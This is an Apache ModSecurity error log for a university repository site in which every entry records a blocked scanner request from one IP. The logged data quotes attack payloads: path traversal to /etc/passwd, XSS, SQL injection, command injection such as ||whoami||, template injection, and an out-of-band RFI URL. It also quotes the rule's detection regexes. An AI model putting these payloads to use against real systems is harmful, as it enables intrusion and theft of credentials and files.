[Tue Aug 29 11:42:00.436876 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gd8bsb7xh83wi4.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gd8bsb7xh83wi4.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAc5SoUAAAAQ"]
[Tue Aug 29 11:42:01.409138 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdQ3dgAAAAV"]
[Tue Aug 29 11:42:04.396793 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdTA@MAAAAY"]
[Tue Aug 29 11:42:05.417651 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdUcykAAAAZ"]
[Tue Aug 29 11:42:06.471503 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdUcy0AAAAZ"]
[Tue Aug 29 11:42:07.509549 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdPLxgAAAAT"]
[Tue Aug 29 11:42:08.358803 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAcrilYAAAAB"]
[Tue Aug 29 11:42:08.411792 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAcoNg8AAAAF"]
[Tue Aug 29 11:42:09.360863 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAc@cWgAAAAL"]
[Tue Aug 29 11:42:09.405745 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdXIlEAAAAd"]
[Tue Aug 29 11:42:11.403311 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdNKFcAAAAR"]
[Tue Aug 29 11:42:11.433174 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAQSWyYAAAA0"]
[Tue Aug 29 11:42:12.419430 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdNKFkAAAAR"]
[Tue Aug 29 11:42:14.359786 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdYBAsAAAAe"]
[Tue Aug 29 11:42:14.363242 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdaZOEAAAAM"]
[Tue Aug 29 11:42:14.435081 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdi99QAAAAk"]
[Tue Aug 29 11:42:15.391581 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdcs9UAAAAC"]
[Tue Aug 29 11:42:17.387423 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdECbAAAAAW"]
[Tue Aug 29 11:42:19.379492 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAc-50UAAAAN"]
[Tue Aug 29 11:42:19.401652 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdECbUAAAAW"]
[Tue Aug 29 11:42:21.573045 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdUc1AAAAAZ"]
[Tue Aug 29 11:42:23.408386 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdZZqsAAAAf"]
[Tue Aug 29 11:42:24.387095 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdeQ1IAAAAQ"]
[Tue Aug 29 11:42:25.387846 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdV7bEAAAAa"]
[Tue Aug 29 11:42:26.378238 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdeQ1YAAAAQ"]
[Tue Aug 29 11:42:27.355849 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAc-51MAAAAN"]
[Tue Aug 29 11:42:27.421014 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAc92yEAAAAD"]
[Tue Aug 29 11:42:28.427992 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAc92yQAAAAD"]
[Tue Aug 29 11:42:30.391019 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAd@3-gAAAAs"]
